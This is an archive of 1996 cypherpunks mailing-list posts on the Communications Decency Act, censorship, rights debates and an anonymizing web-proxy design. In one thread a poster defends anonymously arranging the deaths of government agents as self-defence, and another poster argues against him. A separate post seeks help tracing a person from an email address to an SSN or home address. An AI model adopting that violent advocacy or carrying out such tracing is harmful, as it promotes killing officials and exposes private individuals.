welfare recipients, saying he favored cutting all government "hand-outs and
subsidies" to "eliminate people's reliance on government."  When the host
pointed out that Christensen had outstanding student loans of between
$30,000 and $100,000, the Congressman feebly replied, "Well, I wouldn't have
been able to go to school if I didn't have a student loan."

     In another staggering display of imbecility, Christensen once called
a press conference to announce his personal deficit-reduction plan, which
called for cuts in government spending of $1.5 trillion.  When informed by
a reporter that $1.5 trillion was the entire budget, a bewildered
Christensen hastily changed topics.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 11 Feb 1996 11:18:08 +0800
To: cypherpunks@toad.com
Subject: Re: China
In-Reply-To: <Pine.3.89.9602101826.D2343-0100000@mahavir>
Message-ID: <199602110219.UAA00502@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> However, that is not a reason for complacency. I think your warning is 
> timely, and discussion, perhaps even action, may be called for. If people 
> can mirror a web site so that Germans get access to it (an action I 
> entirely support) what is being done about the large numbers of 
> newsgroups that India and China have no access to? 

I recieved a few emails from people who tried to explain to me why the 
Chineese scheme isn't going to work.  I wouldn't go so far as to say I'm 
unconcered, but one point was sort of reassuring and probably ought to be 
brought out on the list.

The West isn't the Chineese government's main problem -- it's the 
Chineese people they have to worry about.  A firewall can't provide 
internal security -- all it can do, at best, is keep outsiders out.  Even 
assuming that they can pull that off -- and it's extremely unlikely that 
they can -- anything that lets Chineese people talk to each other and 
facilitates discussion is going to end up being far more subversive than 
any information we in the West can send into China.

(This point was made by Perry -- it probably lost something in the
translation.)

As for India and China -- what should be done?  We tend to focus on things
that are within our field of vision.  CompuServe is an American company,
and when they cut out usenet groups in response to events in Germany, it
brought that country to our attention.

I would like to think that privacy activists and civil libertarians in
other countries would find allies and support in the US and European
countries like Finland and the Netherlands.  (We here in the states may
begin leaning on Dutch servers soon if the recently passed decency act is
enforced.)  If you need space on a web server, nntp access, a show of
solidarity -- let us know, and we'll try to deliver what you need.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sun, 11 Feb 1996 11:54:18 +0800
To: Alan Pugh <ampugh@pobox.com>
Subject: Re: Strange Sounds of Silence
In-Reply-To: <199602102305.SAA05611@camus.delphi.com>
Message-ID: <199602110307.VAA05228@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


Alan Pugh <ampugh@mci.newscorp.com> said:

AP> AEN News Commentary by Alan M. Pugh <mailto:amp@pobox.com>

AP> The Strange Sounds of Silence

AP> Has anyone else out there noticed the strange sounds of silence
AP> emmanating from the american print and broadcast media concerning
AP> the rider attached to the Telecommunications Act recently signed
AP> by President Clinton known as the CDA (Communications Decency
AP> Act)?

	Um, no.  I heard about it on CNN, NBC, and the San Antonio
Express-News (in a New York Times Service article), the only
non-online news sources I routinely check.  It appears to me that the
sounds of silence are the only ones you want to hear.

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 11 Feb 1996 11:23:41 +0800
To: cypherpunks@toad.com
Subject: Re: The Communications Decency Act
Message-ID: <9602110216.AA04631@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Deepthroat@alpha.c2.org wrote:

>Why The Communications Decency Act passed, or
>Follow the money
>
>	There's been a lot of commentary the last few days about this
>bill, this strange creature, seemingly of the 'Christian Right.'  Talk
>of how and why its unconstitutional, protests; web pages blackened.
>But, oddly, no one seems to have examined who pushed the bill through
>Congress, or why.

>But where
>does that leave the big guys?  ABC, NBC, CBS??  Can they survive in
>this brave new world which the net threatens to be?
>
>	By and large, they looked at themselves, and saw they could
>not.  

At last!  Somebody bringing up the topic!  I am quite recent on CPunks, 
but I've been trying to push that point on alt.security.pgp and alt.privacy
some time ago.

After several try at it, I dropped the subject.  I couldn't believe that nobody 
considered this explanation to the CDA.  The thought that many so-called 
"free speecher" were actually hired by the big media to create a big fuss
among net users over the "porn vs religious" issue just to act as a diversion 
even crossed my mind!


JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 11 Feb 1996 11:14:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Rights"
Message-ID: <9602110216.AB04631@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Ed.Carp@linux.org, ecarp@netcom.com wrote:

>What happens when there *is* no remedy, when there are no other sites to 
>go to, when there are no employers who would refrain from violating an 
>employee's privacy?  What then?

Easy! Either you do not get on the net or you start your own ISP service.

It might cost money. i.e. requires work, but it is feasible.

No one, neither company nor individual, owes you to provide you with a link simply
because you *wish* it.  If it were otherwise, anybody with the ability to produce would
become slaves to the ones who don't.  Enslavement of Ables for the sole benefit of the
Not-Able.  It would be punishment for being good.

Principles must take precedence over a temporary wish.

JFA
Selfishness is a virtue!
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Sun, 11 Feb 1996 11:26:53 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Strange Sounds of Silence
Message-ID: <199602110225.UAA04931@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> The Strange Sounds of Silence
> 
> Has anyone else out there noticed the strange sounds of silence
> emmanating from the american print and broadcast media concerning the
> rider attached to the Telecommunications Act recently signed by
> President Clinton known as the CDA (Communications Decency Act)?
> 

:Are you sure? The coverage has been wall to wall out here (Bay area); 
:front page above the fold, business pages, computer columns, editorials 
:and editorial cartoons. Apparently it's the same level of coverage back 
:in the RTP.

:What part of the country are you in? I guess the coverage is different 
:in the major geek zones like the bay area and RTP

It really does depend where you are at, all of the Metropolitin cities such as 
NY, LA, Chicago, etc are debating it.

If you live in a more braindead part of the country, well, as has been stated 
before, most  people think the internet is AOL, what do you expect?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMRzi80UffSIjnthhAQFUzgQAv1+te1qXW4Vm6yODxJW7B1fIl67VBSB3
5ec23filS1N0mK+D2al7F/kzcFmyneypuGL8tq6HiBbuJTzP55cNyucQJwUQ3Ysk
jwxRA+GcrzntR3bWdkHNT9DCzrSjJj0DNy2BwAIo8vQlNiKLlUeXmd2wOVvWTHhy
qkk5QVeFY4c=
=DaB0
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Feb 1996 12:04:14 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <199602110333.VAA00832@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From jimbell@pacifier.com Sat Feb 10 20:31:23 1996
> Message-Id: <m0tlQnv-00092TC@pacifier.com>
> X-Sender: jimbell@pacifier.com
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Sat, 10 Feb 1996 17:41:30 -0800
> To: Jim Choate <ravage@ssz.com>
> From: jim bell <jimbell@pacifier.com>
> Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
> Cc: cypherpunks@toad.com
> 
> 
> At 08:13 PM 2/6/96 -0600, Jim Choate wrote:
> >
> >Forwarded message:
> 
> >If the intent is to motivate others to kill or otherwise harm others simply
> >because you don't agree with them or their actions is reprehensible and
> >moraly or ethicaly undefensible.
> 
> That's a misleading statement:  You said, "simply because..."    As should 
> be abundantly clear from my other arguments, I wouldn't wish to see anyone 
> killed "simply because"  of the fact I "don't agree with them."  It is their 
> ACTIONS that I feel violate my rights; that is what  justifies my seeking 
> their deaths, should I choose to do so.
> 

But it is not clear at all. Exactly how do their actions violate your
rights? Are these the rights that you believe that you possess or the ones
that are recognized? Do the actions have to effect you directly and
immediately or must you merely percieve a threat? All of these issues are
unclear in your presentation. And for the final one, doesn't your putting a
contract out on them violate their rights (life, liberty, the pursuit of
hapiness)? The only answer to this is 'yes', meaning that to be ethical you
must put a contract out on yourself. Because your own actions violate 
somebodies rights. This catch-22 situation regarding deadly force is why
anarchy does not work. A perhaps less different example might be: If you
dislike bigots then you are a bigot. In short, you can't help but become
what you hate the most. It pays not to hate or be quick to use violence
since they are so strongly related.

It is not yours, the governments, or anyone elses right to decide who lives
and dies. You have a double standard.

> 
> >Every citizen of this country is a 'government employee' in one sense or
> >another.
> 
> That's about the weakest argument I've heard in a long time.  I'm amazed 
> that you weren't too embarrassed to post it to the list.  While I don't know 
> precisely what your definition of the phrase "government employee" really 
> is, I "every citizen" is a "governement employee" then you must have a 
> REALLY weird definition of that.
> 

Then Lincoln had a equaly weird view: Government of the people, by the
people, for the people. Perhaps this failure to recognize a basic premise of
representative democracy explains your apparent dichotomy in the concepts of
rights. In effect, your rights and their rights. When in fact there is no
difference.

I would suggest you read the Declaration of Indipendance and the Gettysburg
Address (again) to get a better perspective on what and who is supposed to
run this government and how. We have had a basic inversion of how our
government is supposed to work. In short, if there is a question the federal
government is supposed to bow to the will of the people and the states.
Currently the states and people bow to the federal government.

Somehow, I think that this is where  your argument fails, and it fails 
> miserably.
> 
> 
> >By resorting to violence you are no better than the ones you proport to
> >protect us against.
> 
> Sorry, I disagree.  Now, I am certainly aware of the classic "Gandhi-type" 
> total non-violence principle, but it turns out that very few people actually 
> believe in that.

Might does not make right. Ethical cohesion does not rest on numerical
values. In case you have missed my comments before. I am not non-violent. I
do not support the use of violence in any format except in direct and
immediate self-defence. In which case make the beggars eyes bleed, no defeat
and no surrender. This means that if you walk outside and see a person
breaking in your car that in and of itself is not sufficient motive for
deadly force unless they attack you. I do believe (contrary to yourself I
would guess) that if you were walking down the street and somebody suddenly
grabbed you that would be sufficient motive to kill them in self-defence. In
cases like this there simply isn't enough time to evaluate the extent of the
threat, it is clear there is an apparent threat though. In short if your
person is violated physicaly without your premeditated permission then deadly
force is justified. I also believe that you are ethicaly justified in
stopping a person from assaulting or killing a 3rd party for the simple
reason that it could be you next. However, once that immediate threat is
over (for example a 4th party knocks the gun out of the muggers hand and
knocks them on the ground) then use of deadly force is not justified.

> Most people seem to think that they are entitled to 
> protect themselves from violations of rights.  The fact that these 
> violations of rights may be done by "government employees" is at most 
> irrelevant, in that this doesn't justify it.  Anybody who feels entitled to 
> use violence against a burglar, rapist, or murderer is correct; attempting 
> to deny me the right to protect my property from GOVERNMENT people is, in 
> itself, a violation of my rights.
> 

Rights as you use them are only relevant between a government and a citizen.
I as an individual person am not forced to provide you with a forum for free
speech or any other rights guaranteed in the constitution. Apparently you,
as many people do, confuse the rights that are yours in regards the
government with privileges and contractual obligations which govern
interpersonal actions. The local grocery store is not mentioned in the
Constitution. They are under no obligation to provide protection for your
life, liberty, or pursuit of happiness. Your basic argument rests on a straw
man premise, namely that rights guaranteed you by government are guaranteed
you by any and every other possible entity. This is clearly wrong.

It is not ethical to kill another simply for being a burglar. How much must
they steal before you are ethicaly justified in killing them? A $1,000
dollar stereo? Perhaps a $.20 pencil off your desk? Does this not justify
your employer killing you for using their machines for your own use,it is
theft of services after all (and you are on their property). If you have
sufficient force detain them. The legal system will take them from there
(assuming of course we revamp it with the other laws we discuss so heatedly
on here). What I propose is a simple and humane system. If a person commits
a crime which leads to the death or injury another they spend the remainder
of their life in a solitary cell with no chance of parole. In other cases
what should occur is they must work a regular job and provide restitution
for an extended period (ie $100/mo. to you for 30 years). Should they fail
to abide by this or they commit another crime then off they go for 20 years
or so, again with no chance of parole. I also strongly object to plea
bargaining. The whole concept of sending somebody to jail for 2-3 years is
silly and counter-productive. It leads to nothing but professional criminals,
in effect state run training grounds for the criminaly inclined. While in
jail they should be forced to live in work camps and not prisons as we
currently know them (unless they fall into the above 'harm another'
category). What should occur is that they are forced to live a relatively
normal lifestyle. In short, they work 8 hours a day and must pay for their
housing, food, etc. from their earning. What needs to occur is to train
persons to make a living and gain some success at managing a day to day
lifestyle. Our currrent system treats criminals as animals, which does
nothing to prevent further violence on their part, it only increases any
sense of isolation they may have.

> Are you a statist?
> 

No, as I have said on many occassions, I am a strict Constitutionalist.


                                               Jim Choate
                                               
                                               




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 11 Feb 1996 16:07:37 +0800
To: cypherpunks@toad.com
Subject: "internet underground" magazine
Message-ID: <199602110544.VAA17183@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



just went to Barnes&Noble to check out magazine titles on the
Internet/cyberspace, and walked away with 10 separate titles!!

anyway, there is a new one that will be especially appealing to 
cpunks here. I haven't seen it mentioned here:

"internet underground".

issue #3 has interesting articles on
- web transaction tracking, by S.Garfinkel
- "my secret life with Phil Zimmerman", S.Garfinkel
- how to send anonymous email. mentions cpunk remailers. by
editor S.Ellerman

plenty of other fluff.

maybe some people here may want to contribute. often when magazines
start out they are hungry for writers and getting into them is not
as hard.

I suspect "internet underground" may end up covering cpunk topics 
regularly with or without anyone's help from here.

(oh, the spooks are rolling in their coffins. heh.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sun, 11 Feb 1996 11:35:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: This is not "This-is-not-punks" either
In-Reply-To: <ad423d483e0210048f00@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.960210214540.10070C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Tim, 
 
 
  On 02 10 96 you say: 
 
  Anyone who can't filter out messages, either directly or by deleting 
  them quickly, probably isn't in a position to "write code" anyway.... 
 
 
  Allen, you sure hit that nail on the head! 
 
 
  Cordially, 
 
  Jim 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 12 Feb 1996 00:11:17 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security)
Subject: Re: "Rights"
Message-ID: <199602110613.WAA27871@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM 2/10/96 -0600, Ed Carp wrote:
>What happens when there *is* no remedy, when there are no other sites to 
>go to, when there are no employers who would refrain from violating an 
>employee's privacy?  What then?

Then start your own business, as many of the people on this list have done
at one time or another.

And that is why, under real capitalism, unlike socialism, there will 
always be employers horrified by the idea of invading their employees privacy.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Feb 1996 15:44:15 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Choices
Message-ID: <ad42b792440210044a29@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 AM 2/11/96, "A. Padgett Peterson P.E. Information Security"
>Think I have been consistant - am FOR things which add to my choices and
>AGAINST those which reduce the choices available. In general I do not
>mind paying a delta for increased choice so long as it is small

No, I don't think you're consistent. "Tim's Fine Televison Sets" does not
like the idea of having to put CC (and, soon, V-Chips) in its t.v.s. Men
with guns are telling him he must comply, or else.

Your "am FOR things which add to my choices" ignores the fact that
mandatory closed-caption hardware is an infringement on the basic property
rights of someone who offers products for sale.

Those who want CC devices, or V-chip devices, or automatic text-to-speech
converters are of course free to buy them, if someone is selling them. They
are not free to demand that my widget include them.

--Tim

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should fuck him." So the two daughters got him drunk and
screwed him all that night. Sure enough, Dad got them pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents,
your pet dog, or the farm animals, unless God tells you to. [excerpts from
the Old Testament, Modern Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 11 Feb 1996 16:03:24 +0800
To: cypherpunks@toad.com
Subject: Anonymity
Message-ID: <199602110547.WAA00255@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In a project relating to the need for anonymous remailers, I would like
to find out about someone in particular. (I would like to do so without the
resulting information getting circulated any more than it probably already
is.) Specifically, I have a full name and an email and am curious how much
information can be collected. (whoever has those US-population CD's, that's
the kind of thing I'm looking for) Preferrably I would like to go from
the email address only to a SSN or address or something unique, but I will 
make the two of them my starting point if necessary. 

The point being, of course, that anonymous remailers are the only thing
that keeps many email addresses from becoming a life history.

Anyone who can help me research please send PGP encrypted (key 0x994b8f39)
mail.

Thanks

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMR2C0cLa+QKZS485AQFGNgL/XIOSJqabFsiHa9xtwWb1kltGbjcMnLZ4
appMShASZNBUULl9dj7qwyhSxVosgaaKIHPMd9H4DiywRG47WYXxqbKDI1dBSA+l
f7Wy68QYA0RVtL9oci6z+w6UGpwfRbnV
=rP7B
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sun, 11 Feb 1996 12:42:38 +0800
To: cypherpunks@toad.com
Subject: Choices
Message-ID: <960210230549.20217184@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>Well there you have it. Many of the poor clearly are not buying new sets
>that have closed-captioning. Meanwhile, we all pay for it when we buy new
>sets and VCRs. 

High added cost does not follow. We (actually my wife as a Christmas present)
bought the cc box because none of our sets were new enough. I suspect that
the cc decode capability could be integrated into the existing video 
decoder chips at no additional cost (other than what is needed to turn
it on and off & that is done electronically) - suspect that if you look
at trade (e.g. hotel/motel) set prices before cc was added and after that 
you will will see little difference (any body here know ? I have not followed
this.

V-chip could be similarly integrated just by having the signal cause the 
video to lose sync. 

>A hidden tax, that does not benefit those in need. 

Depends on the quanta. I suspect that like cc, in the long run it will have
little or no effect on set prices. BTW, anyone know under what juristiction
the regulation requiring cc devices was issued ? ADA ? - if so would not
work for V-chip.

>ObCypherpunks: A truly surprising number of people on this list are on the
>one hand lambasting the government for thievery, incompetence, corruption,
>and violation of their rights, while on the other hand explaining why they
>think some particular intrusion is justified. 

Think I have been consistant - am FOR things which add to my choices and
AGAINST those which reduce the choices available. In general I do not
mind paying a delta for increased choice so long as it is small

>People need to think about the powerful implications of strong crypto, and
>decide if they are _for_ access to strong crypto by citizens, or _against_
>it. All things follow from this decision.

Am FOR choices. Citizens *have* access to strong crypto. Do not believe
use of crypto in this country can be regulated between two citizens or on
public networks. (Note, I say *public*. On *private* networks, the owner
can enforce any rules he/she/it/other likes.) Gov has right to define
communications with and between itself.

Gov does have the right (in fact the duty) to regulate communications 
between citizens and non-citizens/sites in other lands (and if you do not 
think communications with sites such as anon.penet.fi are inside the charter 
of the NSA, I have this prime Florida land - we're in the dry season now 8*).

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 11 Feb 1996 12:42:24 +0800
To: cypherpunks@toad.com
Subject: The Decense Project
Message-ID: <199602110410.XAA20161@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




The Decense Project

  A few days ago I was reading Clarinet Newsbytes Top news. It read
like something right out of 1984. "Germany cracks down on AOL and
Compuserve", "Japan busts Japanese porn web site", "French bans web
sites with banned book", "China issues internet regulations", and
"Clinton signs Telecom bill" The other shoe is starting to drop. The
ante has been raised as governments around the world are trying to
control the content of the Internet. But the politicians writing this
type of legislation have no clue what they are really dealing
with. They are are part of a centralized organization with a
centralized philosophy trying to cope with something inherently
decentralized, non-physical, and constantly evolving. We all know the
genie is out of the bottle. Let's write some code to keep it that
way.

Enough of the rhetoric.

Decense is the name of what I hope to be, a family of software protocols
designed to "decensor" the net. I'm contributing the first, and I hope,
most useful piece. I hope others will join me in developing this software,
making it more robust, and distributing it across the net.


What is Decense?

The first piece of the Decense software is designed to provide "penet" like
double-blind anonymous transactions for the http protocol. It is written
as a cgi-bin script which provides a seamless mapping between anonymous
ids and remote web servers. Servers running Decense can be chained like
anonymous remailers to increase site level security.


Decense works as follows.

The server maintains a database mapping anonymous ids to url directories.
For instance 'foo' -> 'www.c2.org' as an example. The anonymous ids are
stored as md5 hashes so that if the site is ever compromised, the db
cannot be used to get a complete listing of all anonids<->sites. The
attacker is forced to hash and compare each one he is looking for. 
[yes, he still gets a listing of all the urls, but chaining takes care of
that to some extent. In the future, I want to use the unhashed 'anonid' as 
a key to a symmetric cipher to encrypt/encrypt each url field of the database.
The db would be stored as (hashed(anonid), DES/IDEA(anonurl)
                               ^ key            ^ value       ]


A url is constructed as follows

http://<decense.server.host>/<cgi-bin-dir>/decense/<anonid>/<relative url>

Decense will lookup the anonid in the database, and map it to a url, such
as "http://foo.bar", it will then append the relative url portion yielding
"http://foo.bar/<relative url>"

It will proceed to fetch the document at that URL. If the document is
an html or text file, it will scan the file replacing any references to
the remote server with the decense url.

Example:

Let's say I am running decense at http://foo.bar with an anonid of 
'c2' which maps to www.c2.org.

If I then request http://foo.bar/cgi-bin/decense/c2/index.html
and index.html contains the following URL

<img src="/c2.jpg">

the URL will be changed to 

<img src="http://foo.bar/cgi-bin/decense/c2/c2.jpg"> 

in the returned document.


Future plans for Decense

  I am heavily loaded down with work right now. But future versions of
Decense should have

1) the ability to filter out mailto: and instead, substitute in a url
pointing to a post/mail cgi-script which sends mail to the real recipient
through an anonymous remailer chain.

2) the ability to proxy through SSL servers for encryption

3) the ability to handle authenticated urls properly

4) the ability to handle a document being located on multiple sites, with
optional shamir sharing, so that a site is a) either picked at random
to retrieve a document or b) a portion of the sites are picked, and the
document is fetched and reassembled via a sharing protocol from those
sites.    



I will release source code in about a day, I'm now alpha testing it.

If you would like to contribute to Decense, send mail to 
   rcromw1@gl.umbc.edu

-Ray
rjc@clark.net





 





 






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 11 Feb 1996 14:28:48 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: [NOISY] Re: New Internet Privacy Provider - Press Release
In-Reply-To: <0l7GNu200bk=4YzNJr@andrew.cmu.edu>
Message-ID: <Pine.LNX.3.91.960210231501.1339B-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



> Thanks, but no thanks. I don't need a shell account at $1,200 a year.

It is clearly not for everyone.  However, someone running a
business over the net should really think about how much they pay
in taxes to see if forming an offshore corporation and getting an
offshore web-site makes sense. 

Basically if a net business is paying more in taxes than the extra
costs to operate an offshore corporation it can pay to relocate. 
The operating costs are the web-site/email $1,200/year and about
$500/year to maintain a corporation (~$1,000 first year).  So even
a small business can justify the move.

   --  Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 11 Feb 1996 17:38:55 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tlWju-000915C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 2/10/96 -0600, Jim Choate wrote:

>> >If the intent is to motivate others to kill or otherwise harm others simply
>> >because you don't agree with them or their actions is reprehensible and
>> >moraly or ethicaly undefensible.
>> 
>> That's a misleading statement:  You said, "simply because..."    As should 
>> be abundantly clear from my other arguments, I wouldn't wish to see anyone 
>> killed "simply because"  of the fact I "don't agree with them."  It is 
their 
>> ACTIONS that I feel violate my rights; that is what  justifies my seeking 
>> their deaths, should I choose to do so.
>> 
>
>But it is not clear at all.

I think it is, to most people who read my words.


> Exactly how do their actions violate your rights? 

How specific do you want me to be?  I think the examples I gave in my essay 
made it clear what I believe.

>Are these the rights that you believe that you possess or the ones
>that are recognized? 

"recognized"?  Usta be, "free speech" wasn't "recognized" in many 
jurisdictions.  Are you suggesting that because it wasn't "recognized" that 
it wasn't a right?

Or what, exactly, WERE you suggesting?

>Do the actions have to effect you directly and
>immediately or must you merely percieve a threat? All of these issues are
>unclear in your presentation.

Ultimately, your questions are more philosophical than is appropriate for CP. 

>And for the final one, doesn't your putting a
>contract out on them violate their rights (life, liberty, the pursuit of
>hapiness)?

The answer to that depends dramatically on that someone else's actions, now 
doesn't it?!?

> The only answer to this is 'yes',

Already contradicted above.


> meaning that to be ethical you
>must put a contract out on yourself. Because your own actions violate 
>somebodies rights. This catch-22 situation regarding deadly force is why
>anarchy does not work.

I'm afraid your "logic" is a more than a bit faulty.  This reasoning would 
deny anyone the right to self-defense.

> A perhaps less different example might be: If you
>dislike bigots then you are a bigot.

Perhaps, but bigotry isn't a crime, nor a violation of someone else's rights.

> In short, you can't help but become what you hate the most

I _don't_ hate the use of self-defense.

>. It pays not to hate or be quick to use violence
>since they are so strongly related.



>
>It is not yours, the governments, or anyone elses right to decide who lives
>and dies. You have a double standard.
>
>> 
>> >Every citizen of this country is a 'government employee' in one sense or
>> >another.
>> 
>> That's about the weakest argument I've heard in a long time.  I'm amazed 
>> that you weren't too embarrassed to post it to the list.  While I don't 
know 
>> precisely what your definition of the phrase "government employee" really 
>> is, I "every citizen" is a "governement employee" then you must have a 
>> REALLY weird definition of that.
>> 
>
>Then Lincoln had a equaly weird view: Government of the people, by the
>people, for the people.

Voting in an election does not make a citizen a "government employee."


> Perhaps this failure to recognize a basic premise of
>representative democracy explains your apparent dichotomy in the concepts of
>rights. In effect, your rights and their rights. When in fact there is no
>difference.

Perhaps your weird view of the world explains your opinions.


>I would suggest you read the Declaration of Indipendance and the Gettysburg
>Address (again) to get a better perspective on what and who is supposed to
>run this government and how. 

I am not particularly concerned with "this government."  I don't consider 
"this government" to be somehow "special" from a rights standpoint.


>> >By resorting to violence you are no better than the ones you proport to
>> >protect us against.
>> 
>> Sorry, I disagree.  Now, I am certainly aware of the classic "Gandhi-type" 
>> total non-violence principle, but it turns out that very few people 
actually 
>> believe in that.
>
>Might does not make right. 

On the other hand, exercise of self-defense is not generally considered 
"wrong," either.  I merely am advocating a new type of self-defense, one 
that can be exercised anonymously.  In doing so, it can be a vastly more 
powerful weapon against government tyranny.


>Ethical cohesion does not rest on numerical
>values.

So what's your point?

> In case you have missed my comments before. I am not non-violent. I
>do not support the use of violence in any format except in direct and
>immediate self-defence. 

Aha!  So what this means is, anybody who can assemble a sufficiently large 
force (governments, usually) can use the threat of use of that force to keep 
people from resisting, without hope of ever winning.

Classic statist position.

>In which case make the beggars eyes bleed, no defeat
>and no surrender.

Have you been smoking something?

> This means that if you walk outside and see a person
>breaking in your car that in and of itself is not sufficient motive for
>deadly force unless they attack you.

Who says?  Agents of the government punish criminals every day that do 
things to OTHER citizens.  Do you find that to be wrong?  If not, your 
problem is clear:  You have a double-standard about rights. 

> I do believe (contrary to yourself I
>would guess) that if you were walking down the street and somebody suddenly
>grabbed you that would be sufficient motive to kill them in self-defence.




> In
>cases like this there simply isn't enough time to evaluate the extent of the
>threat, it is clear there is an apparent threat though. In short if your
>person is violated physicaly without your premeditated permission then deadly
>force is justified. I also believe that you are ethicaly justified in
>stopping a person from assaulting or killing a 3rd party for the simple
>reason that it could be you next. However, once that immediate threat is
>over (for example a 4th party knocks the gun out of the muggers hand and
>knocks them on the ground) then use of deadly force is not justified.

But the big problem with this position is that the government specializes in 
NON-IMMEDIATE threats.  The cop says "come with me", and if you don't comply 
he pulls a gun.  If you pull one back, he shoots at you.  If you're holed 
up, he brings in reinforcements.  Etc. Etc. Etc.

In effect, you have defined "self-defense" quite carefully in order to ALLOW 
the use of threats and violence by GOVERNMENT people, without the right of 
the citizen to fight back.  As long as those threats and that violence is 
overwhelming and "legally justified," you'll give the citizens no right to 
resist.

Sorry, but I won't play your little tyrannical games.


>> Most people seem to think that they are entitled to 
>> protect themselves from violations of rights.  The fact that these 
>> violations of rights may be done by "government employees" is at most 
>> irrelevant, in that this doesn't justify it.  Anybody who feels entitled to 
>> use violence against a burglar, rapist, or murderer is correct; attempting 
>> to deny me the right to protect my property from GOVERNMENT people is, in 
>> itself, a violation of my rights.
>> 
>
>Rights as you use them are only relevant between a government and a citizen.

What exactly do you mean by that?


>I as an individual person am not forced to provide you with a forum for free
>speech or any other rights guaranteed in the constitution. Apparently you,
>as many people do, confuse the rights that are yours in regards the
>government with privileges and contractual obligations which govern
>interpersonal actions.

Apparently you are simply confused.

> The local grocery store is not mentioned in the
>Constitution. They are under no obligation to provide protection for your
>life, liberty, or pursuit of happiness. Your basic argument rests on a straw
>man premise, namely that rights guaranteed you by government are guaranteed
>you by any and every other possible entity. This is clearly wrong.

Apparently you are STILL simply confused.

>It is not ethical to kill another simply for being a burglar.

Justa sec.  In early 1800's England, nominally considered a "civilized 
country" many such crimes carried the death penalty on conviction.

